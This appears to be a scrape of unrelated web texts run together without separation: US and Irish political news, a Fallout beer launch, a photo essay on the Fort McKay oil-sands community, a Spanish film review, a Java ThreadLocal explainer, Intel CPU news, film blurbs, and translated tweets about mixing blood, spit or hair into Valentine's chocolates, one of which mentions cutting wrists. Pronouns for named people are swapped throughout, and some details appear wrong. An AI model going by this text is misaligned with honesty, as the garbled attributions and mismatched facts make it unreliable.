But they would lose to Sen. Marco Rubio Marco Antonio RubioHillicon Valley: Senators urge Trump to bar Huawei products from electric grid | Ex-security officials condemn Trump emergency declaration | New malicious cyber tool found | Facebook faces questions on treatment of moderators Key senators say administration should ban Huawei tech in US electric grid Trump unleashing digital juggernaut ahead of 2020 MORE (R-Fla.) by 3 points and Ben Carson Benjamin (Ben) Solomon CarsonPuerto Rico governor, White House clash over meeting Puerto Rico governor says Trump won't meet to discuss hurricane relief The Hill's Morning Report - Can Bernie recapture 2016 magic? MORE by 1 point in hypothetical match-ups.
The survey found that independent voters would back Rubio over the former secretary of State by a 7-point margin. They would lose the Hispanic vote to Clinton, however, by 23 points. Rubio also takes the highest percentage of female voters among the GOP candidates, but falls short in that demographic to Clinton by 7 points.
Clinton holds a 19-point lead over Sen. Bernie Sanders Bernard (Bernie) SandersPush to end U.S. support for Saudi war hits Senate setback Sanders: 'I fully expect' fair treatment by DNC in 2020 after 'not quite even handed' 2016 primary Sanders: 'Damn right' I'll make the large corporations pay 'fair share of taxes' MORE (I-Vt.) in the new poll. Four percent of respondents backed former Maryland Gov. Martin O'Malley.
The NBC News/Wall Street Journal, conducted Dec. 6 to Dec. 9, has a margin of error of 3.4 percent.
Read more from The Hill:
Trump 5 points ahead of Cruz nationally
Fox News poll: Cruz up by 2 points in Iowa
In a first of its kind move, Bathesda has joined hands with Carlsberg to announce a Fallout branded beer aptly named ‘Fallout beer'.
Fallout beer is currently available for pre-order on Amazon.co.uk for £29.99 for a case of 12 bottles with deliveries commencing November 5 – five days before the official launch of Fallout.
According to the official announcement by Bethesda, the beer is inspired by Vault-Tec Industries and will only be available in the UK. While many of you might think that the beer resembles the taste and aroma of Carlsberg, it is said to be brewed using a unique blend of malted barleys combined with selected hops. The Fallout beer is a light coloured pilsner 4% lager that has a refreshing zesty hoppy taste with a crisp bitter finish and a floral aroma, according to the Amazon.co.uk listing.
“This is something of a world-first. Adult participation in video gaming is a truly social activity, on a par with cinema and music, said Bruce Ray, Corporate Affairs Director at Carlsberg UK. “We're proud to work with Bethesda to produce a beer Fallout fans can enjoy”.
Fallout 4 is launching on November 10 for Xbox One, PlayStation 4, and PC. Fallout 4 is the eagerly-awaited follow up to the 2008 ‘Game of the Year', Fallout 3, and the first title from the world-renowned studio since the release of their global phenomenon and 2011 ‘Game of the Year', The Elder Scrolls V: Skyrim.
Surrounded by the Athabasca tar sands of northern Alberta, the forest town of Fort Mckay is far from pretty much everything. For the small First Nation community of Cree and Dene tribes that live there though, the remove hasn't kept things from getting crowded.
The oil industry has been expanding in Alberta's forests for years, steadily eroding the basis for centuries of tradition and ways of life. With much of their water, land, fishing and hunting already compromised, community leaders decided around 2008 to quit resisting the inevitable and instead work with their new neighbors. The arrangement has since brought them a degree of economic advantage, but to some it's akin to a deal with the devil.
“In their identity and their culture, they're very connected to the land,” says Toronto-based photographer Aaron Vincent Elkaim, who documented the community of Fort Mckay from 2011 to 2013. “They can't eat the fish from the river, there are no berries growing anymore that they can really eat … the industry is so invasive to the landscape that it's really clearing everything inch by inch, mile by mile.” The tribal leaders in Ft. Mckay formed a local consortium to engage with Sunco, the oil and gas giant who are mining at the very edge of their reserve. The deal was to allow operations to continue uninterrupted in exchange for work opportunities for their community.
Performing jobs like driving water trucks or providing catering and custodial services, the tribal communities of Fort Mckay have opportunities that didn't exist before. In the process though, they're also supporting the very industry that is inexorably compromising the local environment and upending their traditional way of life. “That money goes back to housing, to infrastructure, it goes into payments to the people in straight annual cash, payments for supporting kids,” says Elkaim. “It is the inevitable — they understand this — but for them it's better to benefit than just sit there and watch and get screwed by it. And they are getting screwed, because at the same time they're making money but they're losing the foundations of who they are.” Google hasn't bothered to send a street view car to Fort Mckay, but from above you can still get a good look at just how much it's hemmed in by Sunco's bitumen gathering operations. Just down river from Ft. Mckay the former city of Fort McMurray, now an “urban service area,” houses Suncor's diaspora of employees (Google has sent a car there).
The company's upstream production is around two million barrels a year. That might sound like a lot, but it's a fraction of the nearly 174 billion barrels sitting in Canada's tar sands. The tar sands are an absolute boon for Canada's export industry, and efforts to mine them continue to expand with the conservative government's support, leaving local communities with little choice but to play ball or find a new place to live.
“They used to fight against the industry, because when it began the river was getting polluted, and that's where they got their fish from, and their water source was getting polluted so they were really getting pissed off, used road blocks and these kinds of things,” Elkaim says. “This community, that had their entire history going back thousands of years, was connected to this landscape, and they had a way of life that 30 years ago was more or less entirely traditional.”
After hearing about the situation in Ft. Mckay, Elkaim decided to photograph the current state of the community. Without any response from local authorities to their inquiries, they drove up in November of 2011 and parked their rented camper in a clearing near the center of town. Their early days there were rough — leaders were in no hurry to talk about their situation with a journalist, and locals had no idea what this outsider with a camera was up to. The man that ended up being their key contact in the region at first thought they were trouble, and followed them back to their car before they could explain their purpose. “He told me, you don't know how lucky you are — I thought you were a drug dealer and I was gonna roll you.”
Instead of roughing them up, the man arranged for Elkaim to stay with their mother. Over the next four months, Elkaim got to know the community and gather impressions of how things had changed. While he's a firsthand witness with clear sight of the facts of the situation, he's careful not to make statements on locals' behalf about their feelings on the issue. Some seem to be open to the change or at least indifferent, while others seem to wrestle deeply with the cost of the deal.
Archaeological records indicate the Dene have lived near Fort Mckay for thousands of years. The Cree first arrived when the fur industry found its way into Northern Alberta a few hundred years ago. But the shift in their way of life has happened very quickly, largely over the last 30 years. “The elders grew up with dog sleds and they got all their food from the rivers and the land and hunting, and it was a very traditional life, and that changed so rapidly,” Elkaim says. “In Canada the native situation is similar to the States in many ways, in that most communities are very poor — they're very impoverished in Canada, houses are falling apart, they're dependent on the government in all their money, so in the case of Fort Mckay, they're completely financially independent and they have good jobs, well paying jobs, and have everything they need financially, so that is a huge benefit in economic terms comparatively to other indigenous people.”
The series, called Sleeping With the Devil after a phrase one of the community elders used to describe the situation, is not a critique of industry per se, but a study of a people undergoing a radical shift in their way of life due to the incredible power of market forces. There is no shortage of photography documenting the sprawling reach and effects of the oil industry, and the sociopolitical and environmental impact is well documented. To visually portray the tension between new opportunity and lost tradition, Elkaim pointed their camera at the people who were experiencing it. “I was always trying to find them when they were engaging the land, and their relationship to it, because to me that's what's being lost,” they say.
The Government and the Troika have agreed on the sale of State assets worth up to €3bn.
The Bord Gáis Energy business will be sold, however this will not include its gas transmission or distribution systems or the two gas interconnectors.
The Government will also be selling some of ESB's "non-strategic" power generation capacity.
It has decided not to go ahead with the sale of a minority stake in ESB, as had previously been signalled.
The sale of some forestry body Coillte's assets will be considered, though not the sale of land.
A spokesperson for Coillte said that any sale of company assets "is clearly a matter for the shareholder and the company is focused on getting on with business."
The State will also be selling its remaining 25% shareholding in Aer Lingus if the share price rises.
It said the Aer Lingus move would take place only when market conditions were right and at an acceptable price to Government.
Minister for Public Expenditure & Reform Brendan Howlin said it had been agreed that one-third of any of the proceeds could be used for re-investment in the economy.
There will be no "fire sales" the Government insisted, adding that important transmission and distribution infrastructure will stay in State ownership.
Mr Howlin said that state assets will only be sold when "fair and good prices" can be obtained for them on behalf of the taxpayer.
In a statement, Bord Gáis said it would now engage with the Government and other relevant parties to ensure that the sale of its energy business would generate the maximum value for the State.
Opposition criticises sale plans in the Dáil
Taoiseach Enda Kenny has said they do not envisage that the sale of State assets will happen this year, but the process could begin in 2013.
Mr Kenny was responding to Sinn Féin leader Gerry Adams in the Dáil this morning.
Mr Adams said there was something wrong when the Government was endeavouring to achieve a sale of State assets worth €3bn when it was going to pay €3.1bn to banks next month.
The Taoiseach repeated that agreement had been reached to use one third of the proceeds of the asset sale on job creation, an outcome that was welcomed by Independent TD Shane Ross.
However, Fianna Fáil leader Micheál Martin has accused the Taoiseach of "misleading" people about the sale of State assets.
Mr Martin said there was no mention of the sale of either €2bn or €5bn worth of State assets in the original Memorandum of Understanding with the Troika.
They said the issue was included on foot of Fine Gael party policy and suggested the agreement with the Troika was being mentioned "to appease Labour backbenchers".
Socialist Party TD Joe Higgins described the proposed sale as "treachery".
Much opposition TDs asked when the Dáil would debate the sale or the legislation necessary to implement it.
The Taoiseach said the Minister for Communications, Energy & Natural Resources would bring proposals on exactly what should be sold to Cabinet by the end of March.
ICTU General Secretary David Begg said they are relieved that the Government is not planning the wholesale sell-off of State assets as had been previously mooted.
However, Mr Begg said they were worried about the sale of Bord Gáis, as energy security is becoming a much more strategic issue for the country.
After a week of misinterpreting, misspeaking and mismanaging the media over their position on the Iraq war, Jeb Bush's hoped-for shock-and-awe campaign-in-waiting looked nothing like a political juggernaut.
“It's the Bad News Bears,” quipped Dave Bossie, president of the Citizens United conservative group. “The problem for Jeb Bush is they didn't look very agile. They didn't look smart in the sense of a rapid-response communications system that could get them out of the trouble they were in.”
Story Continued Below
More troubling for Bush is that many supporters are getting jittery because they appeared ill-equipped to appreciate and manage the demands of the modern-day, 24-hour news cycle. And, they note, this isn't the first time Bush has floundered over what they believe – a waffling that could undermine their reputation as a deep-thinking ideas man comfortable in their own skin, one who decries politicians “who just bend with the wind.”
But Bush appeared to do just that last month, according to conservatives who criticized their shifting positions over Indiana's Religious Freedom Restoration Act, which allowed some businesses to deny some services – in effect, to gays — based on the owner's religious views. Bush said it was “the right thing” to do.
Then, an anti-discrimination national backlash against Indiana brewed. The state clarified the law to ensure it didn't allow for discrimination based on people's sexual orientation or gender identification. Bush changed right along with it by saying the law was “in the right place [because] we shouldn't discriminate based on sexual orientation.”
“Jeb Bush Backtracks on Religious Liberty,” a Reason blogger wrote. “How Does Jeb Bush Feel About RFRA? Apparently, They Can't Decide,” the blog Chicks on the Right opined. “Jeb Bush seems to shift tone on Indiana RFRA at fundraiser,” said a Hot Air blog headline.
Bush was in eerily similar circumstances two years before, in 2013, when they were plugging their new book “Immigration Wars: Forging an American Solution.” The former Florida governor, who previously supported a pathway to citizenship for some illegal immigrants, wrote that they now backed a pathway to legal residency only.
“Those who violated the laws can remain but cannot obtain the cherished fruits of citizenship,” Bush and co-author Clint Bolick wrote.
Oops. By the time Bush's book was out, the political landscape had briefly shifted and their longtime friend and protégé, Sen. Marco Rubio, was at the time a member of the so-called “Gang of Eight” that proposed a pathway to citizenship in its legislation. So Bush, after fumbling to explain their change of heart, reversed course again and explained that they supported a pathway to residency because they generally thought it was the most politically palatable option when they were penning the book, before the Gang of Eight bills.
“I have supported both — both a path to legalization or a path to citizenship — with the underlying principle being that there should be no incentive for people to come illegally at the expense of coming legally,” Bush told CNN in a tortured explanation that The New York Times described Bush as “backpedaling.”
“As political re-entries go, Jeb Bush's has been rocky,” the Times wrote on March 5, 2013.
“Welcome to life as a potential presidential candidate! When you leave open the door to a presidential bid, and are no long just an elder statesman for the party, every little thing starts to become magnified – which has happened to Jeb Bush over the past 24 hours,” NBC's “First Read” blog wrote at the time. “Here's something to remember about Bush: They haven't run a race since 2002 (before Facebook, Twitter, and more partisan media).”
Change the dates and the topic, and Bush's multiple explanations and prolonged waffling are much like what happened to them in describing the Iraq War to FOX's Megan Kelly, who asked last Saturday if they had invaded Iraq “knowing what we know now.” Bush said yes and falsely said Hillary Clinton would have done the same thing.
After that interview, which took place Saturday, some in Bush's orbit realized they might have a problem and discussed whether to call Kelly to clarify their remarks. On Sunday, Fox published a news story teasing the interview that was to air the following day. Once the interview aired, critics and opponents pounced.
On Tuesday morning, Bush's longtime friend and CNN commentator Ana Navarro said on the network that they asked Bush what they meant because even they were confused. Navarro said Bush told them that they “misheard” the question. Some in Bush's inner circle were furious with Navarro and blamed them for making the situation worse – though many believe they felt the need to try to protect their friend as the situation spiraled out of control without an adequate explanation.
Bush finally decided to address the issue in a softball interview Tuesday on conservative commentator Sean Hannity's radio show, where they explained they “interpreted the question wrong, I guess.” Bush said they believed the question referred to what they would have done with the available intelligence at the time.
“I don't know what that decision would have been. That's a hypothetical. But the simple fact is that mistakes were made,” Bush said. On Wednesday, at a Nevada event, Bush continued to refuse to answer “hypotheticals” and said that, in this case, such speculation “does a disservice for a lot of people that sacrificed a lot.” They then had a testy exchange with a college student who accused them of being “pedantic” in responding to them
Finally, after four days and four different explanations, Bush broke down: “If we're all supposed to answer hypothetical questions: Knowing what we now know, what would you have done? I would not have engaged. I would not have gone into Iraq.”
Former Republican consultant Ed Rollins, who worked on Ronald Reagan's campaigns as well as Mike Huckabee's 2008 race, said running for president today takes a deep appreciation for the changes in the news media cycle. And, they said, it didn't appear Bush was aware of that.
“Both they and Hillary Clinton don't appear ready for prime time. She's had the worst few weeks of any candidate I've ever seen, and Jeb was a close second this week,” Rollins said. “But they have no real Democratic challenger while he's got a very, very tough battle in the Republican primary. They can't afford to make these types of mistakes.”
“Making a basic misstep like that with a question that was perfectly, 100 percent predictable is frankly astonishing,” Randy Scheunemann, a former adviser to defense Secretary Donald Rumsfeld under Bush's brother, told BuzzFeed. “It does not bode well for their candidacy.”
State Rep. Matt Gaetz, a Bush backer, said the coverage surrounding Bush's statements over Iraq was overblown. They said that voters would ultimately support Bush because, in the end, they would view their comments and their accessibility – in stark contrast to the off-limits Clinton – as “authentic.”
But many longtime Bush supporters were baffled.
“Jeb doesn't surround themselves with yes men. But they hate being handled, and this is what happens when you don't have a real campaign, when you don't have someone who manages the candidate because he's not really a candidate,” said one longtime Bush-backing Republican. “And even if Jeb was prepared, if they had their talking points, they obviously didn't prepare enough.”
Another Bush supporter pointed out that Bush, before Kelly's interview, had just come from a speech at Liberty University in Virginia. They were likely tired. And they underestimated the importance of the interview.
“He probably thought ‘Oh, it's FOX. It's a friendly interview.' And they got caught with their guard down. And this is like boxing without a rest: Never let your guard down,” the supporter said. One Bush donor said the problem with Bush's management of the situation gives Rubio an opening to win Republicans who were already concerned with Bush's electability.
“These gaffes only serve to make Marco Rubio and Ted Cruz more serious candidates,” said Bossie, the Citizens United president. “This isn't a fatal mistake. It's nothing that $100 million can't fix,” said Bossie, referring to the quarterly fundraising goal the Bush camp hopes to meet by the end of this month.
Bossie said they believed Bush needed to declare their candidacy so they can have a traditional campaign infrastructure around them to help them handle all of the rigors of the campaign trail.
Bush made clear in their FOX interview that they aren't yet a candidate. And, they seemed not to realize that he'd just made a mistake that could ripple across the 2016 race for months to come.
“Here's the deal, Megyn,” Bush said. “If I go beyond the consideration of running to be an actual candidate, do you want people to just bend with the wind, to mirror people's sentiment, whoever is in front of you? ‘Oh, yes, I used to be for that but now, I'm for this.' Is that the way we want to elect presidents?”
Correction: A previous version of this article incorrectly stated where Liberty University is based.
By - -
Aprovechando mis horas de ocio en mi nuevo infierno hogar (hogar que está ubicado en las dependencias de mi lugar de trabajo, loser), decidí ver una película que tenía pendiente hace ya un tiempo. Se trata de The Last Days on Mars.
Lo primero que capté de la peli después de ver el trailer y leer un par de comentarios es que SPOILER ALERT!!!! se trata de zombies… en Marte. Sip, tal como lo oye lee. Es un The Walking Dead: Mars Edition.
Ahora bien, cualquier lugar del Universo conocido (y desconocido) donde haya la más remota posibilidad de vida (aunque sea a nivel microbiano), es un escenario perfecto para que lleguen los genios del cine y creen una obra de arte fílmico (?) en donde los humanos terminamos to-dos muertos. Moraleja: la exploración espacial es el demonio, buscar vida extraterrestre es el demonio, y querer ganarte un Nobel por descubrir algo genial, de seguro te va a llevar a la muerte… así que el Nobel también es el demonio.
¿Por qué digo esto? Porque recordarán como en Apollo 18 SPOILER quedaba la escoba por culpa de las arañas-piedras-del-demonio (que de paso explicaba de forma ultra lógica la desaparición de piedras lunares traídas por las misiones Apollo), y como en Europa Report SPOILER AGAIN! los monstruos-alienígenas-submarinos-del-demonio también hacían que todos murieran. Ya ven como eso de buscar vida en otros lados no está bien… yo no sé en qué piensan estos científicos (?). En fin.
Dicho esto, de las tres películas de trama bastante similar pero en distintas locaciones (Apollo 18 en la Luna, Europa Report en Europa (la luna, no el continente) y The Last Days on Mars en… sí, adivinó, en Marte) debo decir que esta es la que más me entretuvo (le dio la pelea a Apollo 18). Ok, no es la Mona Lisa del séptimo arte, pero me mantuvo despierta el tiempo que duró la película, los paisajes marcianos estaban bien bonis y desérticos, y los actores eran relativamente conocidos, lo que le da un plus (aunque el protagonista me cae mal, porque tiene cara de malo).
No pretendo contarles la película, ni seguir spoileando, así que solamente les diré que la vean si les gustan los zombies y la ciencia ficción y Marte y los astronautas. Para pasar el rato no estaba tan mal.
En cuanto a los detalles técnicos, yo no soy ninguna experta en Marte. Y la astronomía y la física son áreas tan tan vastas que uno no sabe nada de muchas cosas (así como no sabía lo que eran los Eclipses Penumbrales). Probablemente se me pasaron 8127382173971 detalles de cosas que no podrían suceder en Marte, pero hubo uno que sí llamó fuertemente mi atención.
Amanecer en Marte en la película Atardecer en Marte captado por el rover Spirit. (Imagen cortesía de la NASA) Amanecer desde el círculo ártico marciano, captado por el lander Phoenix (Imagen cortesía de la NASA)
Es una tontera… pero encontré que en la escena del amanecer en Marte, el Sol se veía demasiado grande (imagen de la izquierda), casi como en la Tierra (de hecho para mí era como un amanecer terrestre “de todos los días”). Yo recordaba esa foto del Spirit en que al atardecer el Sol se veía pequeñiiiiiiito (arriba a la derecha). Después busqué alguna de un amanecer y encontré una del lander Phoenix (abajo a la derecha) y se ve más grande, pero tampoco tanto como en la peli. En fin, eso es lo único que me percaté y es el típico detalle del demonio que a nadie más le importa.
Si usted se anima y ve la peli, cuéntenos qué le pareció. Porque aquí valoramos su opinión y porque probablemente yo tengo el gusto cinéfilo en las patas :), así que es bueno que los lectores tengan más de un punto de vista.
Saludines y nos vemos en una próxima crítica!
To blog Previous post | Next post
How is ThreadLocal implemented?
This is a follow-up to my last week post, where I explained the motivation behind ThreadLocal usage. From the post we could recall that ThreadLocal is indeed a cool concept if you wish to have an independently initialized copy of a variable for each thread. Now, the curious ones might have already started asking “how could I implement such a concept in Java”?
Or you might feel that it will not be an interesting topic – after all, all you need in here is a Map, isn't it? When dealing with a ThreadLocal<T> it seems to make all the sense in the world to implement the solution as HashMap<Thread,T> with Thread.currentThread() as the key. Actually it is not that simple. So if you have five minutes, bear with me and I will guide you through a beautiful design concept.
The first obvious problem with the simple HashMap solution is thread-safety. As HashMap is not built to support concurrent usage, we cannot safely use the implementation in the multi-threaded environment. Fortunately we do not need to look far for the fix – the ConcurrentHashMap<Thread, T> looks like a match made in heaven. Full concurrency of retrievals and adjustable expected concurrency for updates is exactly what we need in the first place.
Now, if you would apply a solution based on the ConcurrentHashMap to the ThreadLocal implementation in the JDK source you would have introduced two serious problems.
First and foremost, you are having Threads as keys in the Map structure. As the map is never garbage-collected, you end up keeping a reference to the Thread forever, blocking the thread from being GCd. Unwillingly you have created a massive memory leak in the design.
Second problem might take longer to surface, but even with the clever segmentation under the hood reducing the chance of lock contention, ConcurrentHashMap still bears a synchronization overhead. With the synchronization requirement still in place you still have a structure which is a potential source for the bottleneck.
But let us start by solving the biggest issue first. Our data structure needs to allow threads to be garbage-collected if our reference is the last one pointing to the thread in question. Again, the first possible solution is staring right at us – instead of our usual references to the object, why not use WeakReferences instead? So the implementation would now look similar to the following:
Collections.synchronizedMap(new WeakHashMap<Thread, T>())
Now we have gotten rid of the leakage issue – if nobody besides us is referring to the Thread, it can be finalized and garbage-collected. But we still have not sorted out the concurrency issues. The solution to this is now really an example about thinking outside of the box. So far we have thought about the ThreadLocal variables as Threads mapping to the variables. But what if we reverse the thinking and instead envision a solution as a mapping of ThreadLocal objects to values in each Thread? If each thread stores the mapping and ThreadLocal is just an interface into that mapping, we can avoid the synchronization issues. Better yet, we are also escaping the problems with GC!
And indeed, when we open up the source code of ThreadLocal and Thread classes we see that this is exactly how the solution is actually implemented in JDK:
public class Thread implements Runnable { ThreadLocal.ThreadLocalMap threadLocals = null; // cut for brevity }
public class ThreadLocal<T> { static class ThreadLocalMap { // cut for brevity } ThreadLocalMap getMap(Thread t) { return t.threadLocals; } public T get() { Thread t = Thread.currentThread(); ThreadLocalMap map = getMap(t); if (map != null) { ThreadLocalMap.Entry e = map.getEntry(this); if (e != null) return (T) e.value; } return setInitialValue(); } private T setInitialValue() { T value = initialValue(); Thread t = Thread.currentThread(); ThreadLocalMap map = getMap(t); if (map != null) map.set(this, value); else createMap(t, value); return value; } // cut for brevity }
So here we have it. Thread class keeps a reference to a ThreadLocal.ThreadLocalMap instance, which is built using weak references to the keys. Building the structure in a reverse manner we have avoided thread contention issues altogether as our ThreadLocal can only access the value in the current thread. Also, when the Thread has finished the work, the map can be garbage-collected, so we have also avoided the memory leak issue.
I hope you felt enlightened when looking into the design, as it is indeed an elegant solution to a complex problem. I do feel that reading source code is a perfect way to learn about new concepts. And if you are a Java developer – what could be a better place to get the knowledge than reading Joshua Bloch and Doug Lea source code integrated to the JDK? Besides subscribing to our RSS or Twitter feeds of course …
Valentine's Day in Japan is a time when girls give chocolates, known as “honmei choco” (“true feelings chocolate”) to the boys they really like.
Often, these chocolates will be painstakingly hand-made by the girl, before they pass them to their love.
But now, a disturbing “spell” circulating on Twitter suggests that girls are putting their menstrual blood, spit, or hair into the chocolates to ensure that their love is reciprocated.
The following thread translated from compilation site Naver Matome, has curated a series of tweets referring to the trend. Since being posted, the thread has been retweeted over 15,000 times, and clocked up around 200,000 views, as well as featuring on other major internet portals.
But is this a funny hoax to stop pesky boys from eating too many chocolates? Or should boys chew very carefully on February 14…?
From Naver Matome:
[Sad News]A Spell That Says “If You Mix Blood Into Valentine's Chocolates And Give Them To Your Love, Your Love Will Be Returned” Trends On Twitter
Updated: 03/02/2014
OP: wasejo_tjkn0123さん
The Spell That's Being Whispered About Online As If It Were True…
“Mix your blood into the valentine's day chocolates”
From: Chuu ni no asobi [blog]
“Mix in your own saliva”
From: “Honmei choko ni keiketsu wo ireru to omajigai ga” — Fujinyu～
▼ “That Time” Is Already Here!!!!
きっこ:
This year too, I'm praying that I can succeed in love, and the time has drawn near when there will be lots of boys around who will eat my scary hand-made chocolates — that I've made by mixing in my own blood and spit — without even knowing it (笑)
▼ The “Spell” Is Even Trending On Twitter
Picture from pbs.twimg.com
飯尾奈穂:
White chocolate with menstrual blood in it…huh…I guess that the amount of menstrual blood a normal person would loose would be a few mls, right? I reckon that if it was about that much, and you didn't mix it in too much, then there'd be a nice amount of red in it and it would be fine, but I wonder…
みやち°わ:
It's normal for you to mix in your blood and spit in the honmei choco, right????????? Oh???????
°˖✧クソ幼女みかにゃん✧˖°:
I mix in menstrual blood with my honmei choco every year.
うるとらきゅーとえんじぇる吉田ぽち:
If I get my period on Valentine's day, then I can put my secret ingredient in.
うるとらきゅーとえんじぇる吉田ぽち:
Please gods. Please send me my period on the day I make my Valentine's chocolates.
人生おつかるーあ:
One of those girls who quietly mixes their own spit into the Valentine's chocolates.
アミノ酸:
If I'm making Valentine's chocolates, I want to put my own blood in them.
樋口 結慈:
My suggestion to those people who are trying to mix their blood into hand-made chocolates for Valentine's day is frozen raspberries (framboises). They look like dried, congealed blood, and because more than anything they have a tart taste, they'll make people think that it's blood.
ニャスパーちゃん:
It's Valentine's in just two weeks' time. All you virgins who've never received chocolates probably don't know about this, but in hand-made chocolates from girls, at the very least, there'll be blood and spit, and hair that has been ground finely in a mixer. Since these are hand-made from the heart, please be sure to eat them alone in secret ♥︎
きゃさりん。:
If you want to put something of your own into honmei choco for Valentine's day, I think that it's actually best not to put hair, or pubic hair, or blood that you've got through the normal way, but rather to put those chunks of liver things that you get when you're on your period!!! I mean, menstrual blood is the lining of your uterus, so doesn't it excite you to think of them putting that in their mouth? What's more, because it's hard, he'll never find out! Magnificent!
死にたいちゃん:
I've got a mental illness, so I'm going to get some blood from my nose and put that into my Valentine's chocolates ＿人人人人人人人＿ ＞ NOSE BLOOD ＜ ￣Y^Y^Y^Y^Y^Y^Y￣
大図書館のロリコン:
I always put raw chocolate in my Valentine's chocolates, but I'm putting in blood as well.
✁✂✃✄あるせ✄✃✂✁:
Yey, Valentine's!! What's everyone going to make?! I'm going to cut my wrists and put loads of blood in.
蟹男:
If someone mentally ill made the chocolate, then there will definitely be something weird mixed in with it, and anyway, there's no point in hand-making chocolates and not putting something unusual in. If a girl's nails have become short, then that's not because they were making snacks, it's because they're mixing them in with the snacks. Also, if they have more cuts, periods, or stuff like that, then it's definitely black. Well, not black, but blood.
▼ From The Girls' Perspective, “This Stuff Happens On Valentine's”
むてき:
Everyone frustrated because they can't get any menstrual blood to put in the chocolate because of their menstrual cycle.
あいりちゃん:
Putting your own blood in the Valentine's chocolate you're going to give to the boy you like — isn't that pretty much the norm for us girls?
沙やか:
The spell we had when we were in elementary school was that you'd put your own blood and drip the tears you'd cried at the though of the one you loved into the handmade chocolate, or that you'd knit your own hair into the scarf you made for them — these terrifying things were popular and we did them without a care. I never actually did it, but there are probably witches in every period of history #Valentine's
蜜乃サナ◆:
Were there ever any girls who didn't put their own menstrual blood in the Valentine's chocolate?
▼ There Are Probably Some Young Guys Who Won't Be Eating This Year's Handmade Chocolates
蟹山:
I have a friend who's been traumatised ever since they realised that there was hair inside a Valentine's chocolate they had already put in their mouth. Guess it's better than blood, but the poor guy!
美咲@梶裕貴に心臓を捧げる系女子:
They say it's a Valentine's spell and stuff, and it seems that they put hair and spit and stuff in there…do they just want to hurt the person they love? Don't they realise that someone's going to eat it?
明野貴志:
I saw a tweet that said, if you're putting something in handmade chocolate, then I recommend blood. Because at least blood has some umami. And now the heart palpitations won't stop.
王 妃:
Huh? You thought that Valentine's chocolates didn't have bodily fluids, blood, or hair in them? Valentine's Day is when AIDS get transmitted the most.
まもたん童貞卒業わず:
Valentine's is scary wwwwwwwwwwwww Like there'd be spit or blood in the chocolate ～wwwwwwwwwwwwwwwww glad I don't have to worry about that wwwwwwwwwwwwwwwww ain't no one gonna give me any (^.^)
黐月(りつき):
Just felt a shiver go down my spine at the premonition of there being girls who hand chocoloate with nails or blood or spit in it to the boy they like on Valentine's.
小野寺ヒカリ@ストフェス参加:
It's too frightening to put your own blood or hair in Valentine's chocolates…but seems like there are quite a few people who do…they put spit and stuff…DISGUSTING…
仮縫:
The thing about Valentine's chocolates is that you're happy if you get handmade chocolates from someone you're close to, but if you get handmade chocolates from someone you're not close to, then it's scary. You start getting anxious that there might even be poison in them w.
海砂利水魚:
Just thought this, but when girls are making Valentine's chocolates and stuff, they mix it with a spoon, and then they lick the spoon, so won't the chocolate you get have at least a little bit of spit mixed in with it?
カミーユ・ビダンの再来:
I'm a bit frightened of handmade chocolate. What am I scared of? — Well, before one actor ate the handmade chocolate sent to them by a fan, they broke it in half and a load of pubes fell out. I'm scared of that kind of thing happening.
あば・レ・うま:
Intel's fifth-generation Core processor family—code-named Broadwell—might be late, but the company has cooked up a couple of brand-new Haswell-class desktop CPUs that PC enthusiasts are sure to dig. Code-named Devil's Canyon, Intel unveiled the all-new Core i7-4790K and Core i5-4690K processors at Computex on Tuesday (Taiwan time). Intel is also marking the 20th anniversary of its Pentium processor by introducing the all-new Pentium G3258.
The Core i7-4790K is notable for its ability to run all four of its cores at a base clock frequency of 4.0GHz. Other Intel CPUs have been able to reach this frequency on one or several cores for brief periods (a burst mode Intel identifies as “Turbo Frequency”), but this new part will run that fast consistently and boast a turbo frequency up to 4.4GHz.
The new Core i5-4690K, meanwhile, will operate at a base clock speed of 3.5GHz with a turbo frequency up to 3.9GHz. Both new CPUs have unlocked clock multipliers, which will enable the end user to push these chips' operating frequencies even higher.
The Core i7-4790K is the first Intel CPU to run all four of its cores at 4.0GHz consistently.
In an embargoed briefing last week, Intel VP Lisa Graff said Devil's Canyon was developed on a very fast track, starting in December, 2013. “We gave our engineering team a target,” Graff said, “we wanted a part that could run at 4GHz on all four cores. But we also put a lot of restrictions on them: ‘You can't change the cooling solution, you can't change the socket, and it has to work with our existing chipsets.'”
Works with existing motherboards
That means the new parts will plug into existing motherboards with LGA 1150 sockets and either Intel's Z87 or 9-series chipsets. Graff said that motherboard manufacturers will need to tweak their Z87 boards to accommodate the new CPUs, in part because the chips' TDP (thermal design profile) has edged up from 84 to 88 watts.
Intel's engineers “hit the two things you need to address to crank up the frequency,” Graff said, “You need to make some packaging changes, so they added a huge number of capacitors to deliver smooth power. And they produced a new thermal solution that works with existing cooling solutions.”
Intel's Devil's Canyon logo.
The new thermal solution Graff spoke of is known by its very long acronym: NGPTIM (Next-Generation Polymer Thermal Interface Material). It's essentially grease that the factory applies to the heat spreader housing the processor.
When a heatsink and fan (in an air-cooled system) or a water block (in a liquid-cooling system) is clamped to the CPU, the grease spreads over the top of the chip's heat spreader and helps transfer heat from the chip package to the heatsink or water block so it can be dissipated.
Consumers will be able to buy the new CPUs with or without Intel's own heatsink and fan, but I predict most DIYers will favor third-party cooling solutions from the likes of Corsair, Zalman, NZXT, and others.
While both Devil's Canyon parts are quad-core CPUs, the Core i7 variant supports eight execution threads, where the Core i5 model supports only four. By the same token, the Core i7-4790K will have 8MB of cache, where the Core i5-4690K has 6MB. But both processors will have the same integrated graphics processor—an Intel HD 4600—and both will be capable of addressing DDR3/1600 memory over two channels. Intel expects the new Core i7 part to sell for $339 and the Core i5 for $242 (that's for quantities of 1000 without a heatsink and fan).
Intel is introducing a new unlocked Pentium processor: The Pentium 3258.
The Pentium reinvented
Graff also unveiled an unlocked Pentium processor, the Pentium G3258. It will operate at a base frequency of 3.2GHz, but like the Devil's Canyon parts, it will have an unlocked multiplier to attract PC enthusiasts. This dual-core part will have integrated Intel HD Graphics and be capable of addressing DDR3/1333 memory over two channels. It will be compatible with Socket 1150 motherboards with Intel 8- or 9-series chipsets, and it will have a TDP of 53 watts. Intel expects it to cost $72 (in quantities of 1000, without a heatsink or fan).
This isn't the first time Intel has revealed information about Devil's Canyon and the new Pentium processor. Graff discussed both parts at a press briefing related to the 2014 Game Developers' Conference in March.
Coming Soon
Jinn
When a girl accidentally releases a jinn in the form of a teenage boy, they learn they've also unleashed an ancient darkness that threatens the world.
THE DEVIL ALL THE TIME
Desperate to save their dying wife, a man turns to prayer -- and more extreme measures. A gothic drama starring Tom Holland and Chris Evans.
